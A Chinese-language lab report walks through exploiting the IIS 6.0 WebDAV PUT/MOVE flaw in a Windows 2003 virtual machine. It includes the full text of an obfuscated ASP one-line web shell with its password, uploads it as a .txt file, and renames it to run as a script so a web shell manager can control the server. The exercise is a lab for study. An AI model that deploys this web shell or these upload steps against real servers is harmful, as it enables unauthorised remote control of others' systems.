实验名称:iis 6.0 漏洞
实验环境:windows2003虚拟机,w10物理机
实验报告:
1、打开一台w3虚拟机,设置nat连接确保 和自己本机在同一局域网
2、在w3虚拟机安装iis服务器 按照下面步骤 进行勾选 确保可以使用asp文件
3、打开iis服务器,给默认网站设置权限
4、可以尝试先在 iis服务器的默认路径下 创建一个asp 文件
5、向asp文件写入一句话 保存 这是一个获取当前时间的代码
6、然后在 w10本机上 尝试访问一下 w3 ip地址加 a.asp
7、在 windows2003 iis服务器的默认路径 找到wwwroot 文件 给来宾用户设置权限
8、在 w10本机 打开 一个 iiswrite 软件
9、然后在本机新建一个 txt 文件 然后往里面添加一句话
<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("shezhang"))%>
10、打开 iiswrite软件 设置put 上传 选择 刚才的txt 文件 域名写 w3 虚拟机的ip地址
因为 windows 拒接接受 aps 文件 所以上传 txt 文件
11、然后点击 提交数据包 点击后 提示上传成功为201
12、返回w3虚拟机 查看iis默认路径 发现多了一个 test.txt
13、回到 w10 本机 对刚才上传的文件进行一个重命名 move 选择move
第一行为 重命名的对象 名字
第二行是 ip地址
第三行是 重命名之后的名称
14、点击提交提示 207说明重命名成功 返回w3 虚拟机查看一下
15、打开 这个软件 右击空白处点击添加 地址为 w3的ip地址加这个脚本名 密码 点击添加
16、添加完 双击 刚才添加的 就可以直接进入到 w3虚拟机的系统